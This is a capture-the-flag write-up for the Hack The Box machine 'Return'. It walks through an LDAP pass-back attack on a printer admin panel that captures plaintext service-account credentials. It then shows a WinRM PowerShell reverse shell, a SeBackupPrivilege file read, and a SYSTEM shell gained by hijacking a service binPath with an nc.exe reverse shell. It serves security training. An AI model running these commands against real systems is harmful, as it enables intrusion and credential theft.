HTB - Return
Target IP: 10.129.95.241
Domain: return.local
DC Hostname: PRINTER.return.local
OS: Windows Server 2019 (10.0.17763)
Difficulty: Easy
Author: [g1nt0n1c]
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
# Full version/script scan, skip host discovery (-Pn), verbose, save all formats
nmap -sV -sC -Pn -v -oA nmap/Return 10.129.95.241Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | IIS 10.0 | ”HTB Printer Admin Panel” — web UI for a network printer |
| 88/tcp | Kerberos | Domain Controller confirmed |
| 389/tcp | LDAP | AD LDAP; domain return.local — and the port the printer uses to authenticate |
| 445/tcp | SMB | SMB signing required — relay attacks blocked |
| 5985/tcp | WinRM | Remote shell entry point if valid credentials are found |
| 3268/tcp | LDAP GC | Global Catalog — full forest-wide directory |
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos
389/tcp open ldap Microsoft Windows AD LDAP (Domain: return.local)
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Service Info: Host: PRINTER; OS: Windows
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Key observation: Port 80 exposes a printer admin panel. Network printers commonly authenticate against LDAP/AD to validate print job permissions. Any UI that lets you change the LDAP server address is a candidate for a Pass-Back Attack.
2. Phase 2: Pass-Back Attack — Credential Capture via Printer
2.1 Identify the Vulnerable Configuration Page
Browsing to port 80 reveals the HTB Printer Admin Panel. The Settings page exposes:
- Server Address — currently the DC’s IP
- LDAP Port — 389
- Username —
svc-printer - Password — masked but stored on the device
2.2 The Attack Concept
The printer is configured to authenticate to an LDAP server. If we replace the server address with our own IP and start a listener on port 389, the printer will connect to us and send its stored credentials in the clear as part of the LDAP bind request.
This is called a Pass-Back Attack: rather than cracking a hash, we redirect the authentication flow back to ourselves and receive plaintext credentials.
2.3 Execute the Attack
Step 1 — Start a raw listener on port 389 (LDAP)
# Listen on port 389 — the port the printer will connect to
nc -lvnp 389Step 2 — Replace the server address in the printer’s Settings page with your tun0 IP, then click Update/Save. The printer immediately attempts to re-authenticate.
Step 3 — Catch the credentials
connect to [10.10.16.149] from (UNKNOWN) [10.129.95.241] 59659
0*`%return\svc-printer
1edFg43012!!
The LDAP bind request contains the username and password in plaintext.
2.4 Validate Captured Credentials
# Confirm the credentials work over WinRM
nxc winrm 10.129.95.241 -u svc-printer -p '1edFg43012!!'
# [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)3. Phase 3: Initial Access
3.1 Open Shell as svc-printer
Generate a Base64 PowerShell reverse shell at revshells.com, execute via WinRM.
# Start listener
rlwrap nc -lvnp 5555
# Execute reverse shell payload
nxc winrm 10.129.95.241 -u svc-printer -p '1edFg43012!!' -X "powershell -e JABjAGwAaQBlAG4AdA..."
# whoami
# return\svc-printer4. Phase 4: Privilege Escalation
4.1 Enumerate Group Memberships
# Show all local and global group memberships for the current user
net user svc-printerLocal Group Memberships:
*Print Operators
*Remote Management Users
*Server Operators ← High-value group
Server Operators is a built-in Windows group that can start/stop/modify system services and has powerful backup privileges. This is a well-known privilege escalation path.
4.2 Enumerate Privileges
whoami /privPrivilege Name Description State
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeBackupPrivilege Back up files and directories Enabled ← bypass ACLs for reads
SeRestorePrivilege Restore files and directories Enabled ← bypass ACLs for writes
SeShutdownPrivilege Shut down the system Enabled
Two paths to escalation are available — we use both below.
Path A: Read Privileged Files via SeBackupPrivilege + robocopy
SeBackupPrivilege allows a process to bypass NTFS ACL checks when reading files. robocopy /B invokes the Backup API, letting us copy files we cannot normally read — including Administrator’s desktop.
# /B = Backup mode (bypasses ACL). Copies Administrator's desktop to a world-readable location.
robocopy /B C:\Users\Administrator\Desktop C:\Temp
# Read the flag
type C:\Temp\root.txtPath B: SYSTEM Shell via Server Operators Service Abuse
Server Operators can reconfigure and restart any Windows service. We overwrite the binPath of an existing service with a reverse shell binary (nc.exe), then restart the service to execute it as SYSTEM.
Step 1 — Transfer nc.exe to the target
Upload nc.exe to C:\Users\svc-printer\Documents\ via the Evil-WinRM upload command or a Python HTTP server.
Step 2 — Hijack the VSS service binary path
# Overwrite VSS service's executable with our nc.exe reverse shell
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.149 4444"Step 3 — Start listener on Kali
nc -lvnp 4444Step 4 — Restart the service to trigger execution
sc.exe stop vss
sc.exe start vssResult:
connect to [10.10.16.149] from (UNKNOWN) [10.129.95.241] 49264
Microsoft Windows [Version 10.0.17763.107]
C:\Windows\system32> whoami
nt authority\system
Deep Dive: The Pass-Back Attack
Network printers, scanners, and other embedded devices frequently authenticate against LDAP to look up user mailboxes (scan-to-email), validate print permissions, or sync address books. The credentials are stored on the device itself.
The admin panel’s “Server Address” field is trusted blindly — the device makes an outbound LDAP bind to whatever IP is configured. By pointing it at ourselves and listening on port 389, we receive the stored credentials in the LDAP bind request, which carries the username and password in plaintext (simple bind, not SASL).
Why this is so effective:
- No hash to crack — credentials arrive as plaintext
- Requires only web UI access to the printer admin panel
- The printer re-authenticates immediately on settings save — no user interaction needed
- The same technique applies to any device that makes outbound LDAP, SMTP, or similar authentication requests: VoIP phones, network scanners, monitoring agents
Deep Dive: Server Operators — Service Binary Hijacking
The Server Operators built-in group was designed to let non-admin staff manage services on servers. It grants:
sc.exe config— modify any service’s binary path, startup type, or accountsc.exe start/stop— start and stop any service- Inherited
SeBackupPrivilegeandSeRestorePrivilege
Service binaries run under the account defined in the service configuration. System services (like VSS) run as NT AUTHORITY\SYSTEM — the highest-privilege account on Windows. By replacing the binary path with our own executable, the next service start runs our code as SYSTEM.
Defensive note: The Server Operators group is frequently over-assigned in production environments. Audit group membership and prefer granting only the specific service management rights needed rather than full Server Operators membership.